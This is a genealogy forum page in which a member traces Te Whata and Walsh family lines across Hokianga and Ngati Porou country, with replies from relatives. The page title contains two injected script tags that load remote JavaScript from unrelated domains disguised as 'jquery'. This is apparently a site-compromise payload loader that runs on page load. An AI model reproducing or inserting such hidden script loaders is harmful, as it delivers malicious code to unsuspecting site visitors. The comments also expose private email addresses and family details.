Te Whata<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Te Whata

Journal by joshy28

Trying trace back on my dads side. My gandmothers maiden name is Walsh and my grandfather is Te tahua Te Whata. They were known by everyone as just Mama and Papa. Papas nick name was Whara... Im trying to trace back the Te Whata side through my Great Grandfather who was Wiremu Te Whata.

Wiremu Te Whata was a Forest worker. He and some others from Ngapuhi ran out of mahi which led them to the Ngati porou rohe where Wiremu met Ripene Tahata. Wi Tahata and Hera Moihi were Ripenes parents (only 50 percent sure. They also had 5 tamariki i think).
Ripene and Wiremu had 7 or 8 children. (arohamai i am still trying to confirm the 8)
The children were as follows

Waimatao (F born 1906), Harata (F,1907), Te Tahua (my grandfather, 1909), Haami (M, 1912, married a person called Rangiwai or to the Rangiwai's), Hataira (F, 1919), Waiwikitoria (F, 1922), Whaare (F, 1926, still alive in Ruatoria.)

also, Hokimate was a sister but need to confirm.

I'll be heading up to see nany whaare in couple weeks or so. Hopefully she can shed some light.

I would apreciate anything you guys can add to this whakapapa. Te Tahua is my koro. There was a bit of confusion as to his real name. Was it Bill or was it Te Tahua? but no, his name is Te tahua son of Wiremu Te Whata who i have yet to find out about.

As for my nany, ki te taha o taku matua. Her name is Keita or Kate Te whata. Her Father was Bill Walsh.
Kate walsh, my nany, had heaps of brothers and sisters. Charlie and sophie are two of them. Apprently Sophie is living in Tokoroa to this day....

I got alot more walking to do, but i know ill get there in the end. I am 27 years of age and only now i am begining to sense, Belonging and who my whanau are!!! i really cant wait im so thrilled!!!

Kia ora koutou
ma te wa

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by joshy28 Profile | Research | Contact | Subscribe | Block this user
on 2010-05-12 21:35:57

joshy28 has been a Family Tree Circles member since May 2010. is researching the following names: WALSH, TEWHATA, TANGAROA.

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by chereeormond on 2011-01-24 00:27:19

Kia Ora have you heard of a Sol Te Whata? If so do you know if he had any children?

by RobTeWhata on 2011-12-20 00:01:46

How's it. I got this link from a friend who asked me if i was in any way related. I'd have to say we would be pretty close. My Father is John William Te Whata whos father was Douglas William Te Whata. Drop me an email some time. Also there is a Facebook page for Te Whata whanau and all have talked about how they are Te Whatas.

My email is ataporoa@hotmail.com


by mtewhata on 2011-12-21 17:25:30

Kiaora Joshy

if you are still looking for your whanau there is a lady in motukiore up in the hokianga who will be able to tell a few things. Her name is Polly Rutene nee TeWhata.
I am Moanaroa TeWhata. our family is from Omapere, Hokianga..The Name TeTahua belongs to one of our tupuna chief of ngati Ue and ngai tu of Otaua, Hokianga, just down the road from Taheke. Otaua is where TeTahua is buried

by mtewhata on 2011-12-21 17:37:18

Me again. Marae where TeTahua TeWhata is from is Puketerata marae, Otaua. Hokianga,

by bertafull2211 on 2015-07-12 00:18:55

nanny whare is my grandmother she passed away lastyear

by franaleey on 2016-04-21 08:44:48

Kia ora, im looking for a contact in puketerata marae too. My whanau come from there.
Joshy email me anytime- franaleey@hotmail.com
We could possibly help each other connect

by otitarawa29 on 2019-02-27 07:37:14

Te Tahuna tewhata is from pukerata Marae in otaua mangatawa rd my name is te-oti Tarawa he is resting at Tarawa piupiu across from our marae

by Hera1416 on 2020-04-17 12:23:57

Kiaora Joshy, just recently checking out my mother's whakapapa. Her mother was a Walsh. I believe she was ur nanny Katie's sister. Her name was Lavinia Walsh. I do hope you still check this site 🤞 exciting

by maxinewalsh on 2023-09-12 07:50:10

kia ora joshy. my name is maxine walsh. my grandfather was Charlie Walsh who was Mama's brother, and his wife was Hapaira (aka Hokimate) TeWhata who was Papa's sister. In case you're still wondering.... Yes Wi Tahata and Hera Moihi were Kahu Ripene's parents. Nanny also had an older sister Tepora TeWhata who lived with Aunty Whare until she died. She may have been the eldest (??). Yes uncle Sam TeWhata was married to a woman from the Rangiwai (Rangiuaia?) whanau. They lived in Tokomaru Bay. Uncle Sam lived with Aunty Wai in Ruatoria for many years.
Gizz a shout out if you want to know more. I'm not sure if you're still following the page. I am also searching for more of the Te Whata side. Wiremu TeWhata was my great grandfather. Thank you to the Hokianga whanau who have provided info on this thread. It has been invaluable.

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